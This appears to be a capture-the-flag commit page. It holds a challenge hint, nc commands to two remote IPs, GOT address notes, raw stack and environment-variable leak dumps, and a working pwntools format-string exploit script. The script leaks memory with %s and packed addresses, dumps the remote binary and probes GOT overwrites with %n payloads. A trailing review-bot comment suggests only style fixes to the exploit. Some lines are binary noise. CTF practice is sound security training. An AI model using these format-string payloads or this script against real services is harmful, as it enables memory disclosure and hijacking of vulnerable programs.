Commit 19c60661 authored by Chris James's avatar Chris James

updated

parent ef0a1b01
Description:
Dr. Watson is often a foil to Sherlock in both appearance and personality, but he trusts
Sherlock too much, that’s the thing Sherlock exploited to fake his death!
No need to binary file!
nc 146.185.168.172 54515
nc 178.62.249.106 54515
7j 綠7DH5
\ No newline at end of file
H
\ No newline at end of file
0x400780 == return address from printf
0x4005a0 == puts == 0x601018 (690)
0x4005b0 == sym.imp.stack_chk_fail == 0x601020
0x4005c0 == printf == 0x601028 (800)
0x4005d0 == sym.imp.setvbuf == 0x601030 (0x7fca403dfe70)
0x4005e0 == scanf == 0x601038 (04d0)
0x4005f0 == entry0
0x4006da == main
what is 0x00600ff8? double check 0x00400574 instruction...
[1, 7f295eb12790, a, 0, 7f9c71806700, 7ffc1c0f7528, 100000000, 786c243830254141, 7ffdd8725c00, 1, 7ffe8fd2a250, 7fa75112c168, f0b2ff, 1, 4007cd, 7ffc73209efe, 0, 400780, 4005f0, 7ffec900b7c0, cf3ea354928d1f00, 400780, 7f530489f830, 1, 7ffdf7a94d68, 192301ca0, 4006da, 0, fba447396ac42bde, 4005f0, 7ffc8b0c2110]
['',
'',
'',
'\xf0\x05@',
'\xa0<\xc0\xe8\x01',
'',
'\x16\xba\x80\x07@',
'\x01',
'\x89\xc7\xe8\xf9\x97\x01',
'',
'1\xedI\x89\xd1^H\x89\xe2H\x83\xe4\xf0PTI\xc7\xc0\xf0\x07@']
1.7f18f00b9790.0.0.7f18f02dc700.7fffa4af1438.100000000.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.2e786c252e786c25.7fff00786c25.4f33ab934bda6900.400780.7f18efd13830.1.7fffa4af1438
.1.7fe1df072790.a.0.7fe1df295700.7ffc43a65818.100000000.6c252e6e6c243225.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.6c252e786c252e78.2e786c252e78.4005f0.7ffc43a65810.
libc.so.6
__isoc99_scanf
puts
__stack_chk_fail
stdin
printf
stdout
setvbuf
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
[0, 0, fd8fe31cbd163a04, 60586f26ffe7db, 0, 0, 0, 7ffc74edca98, 7f497a991168, 7f60c91e67cb, 0, 0, 4005f0, 7ffc038cd1f0, 0, 40061a, 7ffd5432fb48, 1c, 1, 7ffc054fff00, 0, 7ffc2f842f26, 7ffee732ff68, 7fff3ac42f7e, 7ffe41428f89, 7ffeda5f7f9b, 7ffefb56ffa6, 0, 21, 7ffcd8ba5000, 10, f8bfbff]
[&/.r\xfd\x7f, , \xeb\xd3\x0f\x1f, \x01, \x1c, Dong_a99e4272325430e3ea60e82e28cd03de, PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, HOSTNAME=d15784a5870b, TERM=xterm, user=dongfangroad, HOME=/root, REMOTE_HOST=70.171.63.47, \x7fELF\x02\x01\x01]
[6, 1000, 11, 64, 3, 400040, 4, 38, 5, 9, 7, 7ff770dcf000, 8, 0, 9, 4005f0, b, 3e8, c, 3e8, d, 3e8, e, 3e8, 17, 0, 19, 7ffefdd551d9, 1a, 0, 1f, 7ffd220a3fbf]
[\x7fELF\x02\x01\x01, n\xe2\x7f\xe8r\x1c:\x93\xc6\xf4~~%\x85\x984x86_64, /home/dongfangroad/Dong_a99e4272325430e3ea60e82e28cd03de]
#!/usr/bin/env python2
from pwn import *
from binascii import hexlify,unhexlify
from IPython import embed
ips = ["146.185.168.172", "178.62.249.106"]
port = 54515
def log(message, sev=0):
msg = ""
if sev == 0:
msg += "[INFO] - "
elif sev == 1:
msg += "[WARN] - "
elif sev == 2:
msg += "[CRIT] - "
else:
msg += "\t"
msg += str(message)
print(msg.rstrip())
def leak(startAddr):
try:
p = remote(ips[0], port)
except Exception as e:
return -1
log(p.readline())
#p.sendline("%lx." * 22 + "A%s." + "%lx" * 2)
log("Leaking bytes from {}:".format(hex(startAddr)))
p.sendline("AA.%9$s." + p64(startAddr))
output = p.read()
log("Output: {}".format(output))
chunks = output.split(".")
log("Bytes leaked: {}:\n\t{}".format(len(chunks[1]), chunks[1]), sev=1)
p.close()
return chunks[1]
def dumpData():
chunks = []
#edit these addresses to specify ranges of the binary to dump. trailing NULL bytes are lost....you have to re-add them when you join the files together.
start = 0x400e00
end = 0x401000
cursor = start
log("Starting Cursor: {}".format(hex(cursor)), sev=2)
while (cursor < end):
chunk = leak(cursor)
if chunk == -1:
break
chunks.append(chunk)
cursor += (len(chunk) + 1)
outFname = "output_{}-{}.bin".format(hex(start), hex(cursor))
with open(outFname, 'wb') as f:
f.write('\x00'.join(chunks))
log("Ending Cursor: {}".format(hex(cursor)), sev=2)
embed()
def patchBinary():
"lets patch the GOT so that main() gets called over and over"
mainAddr = 0x4006da
putsAddr = 0x601018
stack_chk_fail = 0x601020
try:
p = remote(ips[0], port)
except Exception as e:
return -1
log(p.readline())
#p.sendline("%2$lx.%2$s." + ("%lx." * 10))
#p.sendline("%22$lx")
#p.sendline("%lx." * 25)
#p.sendline("%2$ln." + "%lx." * 20)
#p.sendline("%20$n.%1$x")
#target = 0x601018
#target = 0x601060
target = 0x600e10
#p.sendline("AA%59lx." + "BB%13$n." + "%1687lx." + "D%14$hn." + "EE%14$s." + p64(target + 2) + p64(target))
p.sendline("AA%20$s")
sleep(0.1)
output = p.read()
log(output)
try:
log(p.read(), sev=2)
except:
pass
embed()
p.close()
def leakStack():
words = []
#stackWords = [2, 5, 6, 9, 11, 12, 16, 20, 23, 25, 30]
#stackWords = [39, 40, 41, 45, 48, 51, 53, 54, 55, 56, 57, 58, 61]
#stackWords = [75, 91, 95]
stackWords = [9]
#stackWords = [2, 5, 6, 9, 11, 12, 16, 20, 23]
#for i in range(1, 0x20):
for i in range(0xff):
try:
p = remote(ips[0], port)
except Exception as e:
return -1
log(p.readline())
#p.sendline("A%{}$lx.".format(str(i).zfill(2)))
#p.sendline("AA%{}$s.{}".format(str(i).zfill(2), chr(i)))
p.sendline("AAA%9$s.{}".format(chr(i)))
output = p.read()
log(output)
words.append(output)
embed()
def main():
#comment this out if you're not dumping slices of the binary
#dumpData()
#uncomment this for patching the binary/playing with basic format string primitive
#patchBinary()
leakStack()
if __name__ == "__main__":
main()
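Review bot: The bare `except: pass` around the second `p.read()` in `patchBinary` swallows every exception, including `KeyboardInterrupt` and `SystemExit`, so an interrupted run falls straight into `embed()` with the socket still open; narrow it to the condition it is meant to tolerate, `except EOFError: pass`, and move `p.close()` into a `finally:` so the connection is released even when the interactive session exits by raising. The `log` helper has no docstring for its `sev` argument although every other function depends on it; a one-line `"""Print message with an [INFO]/[WARN]/[CRIT] prefix for sev 0/1/2; any other sev indents the line instead."""` would state that contract. As a point of style, `ips` lists two hosts but `leak`, `patchBinary` and `leakStack` each hard-code `ips[0]`, so the second entry is dead data unless it is meant to be selected by a parameter.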
[1, 7fadfeaa7790, a, 0, 7f401f78e700, 7ffc94ff4868, 100000000, 2e786c2438302541, 7ffd608c3300, 1, 7fff55156660, 7fe277eb8168, f0b2ff, 1, 4007cd, 7fff7cdf512e, 0, 400780, 4005f0, 7fff5d9d5090, 251c0411fc141c00, 400780, 7fd7a6d4f830, 1, 7ffc0f13e9e8, 1ef46bca0, 4006da, 0, 19dca84e3971c174, 4005f0, 7ffeda5abc80]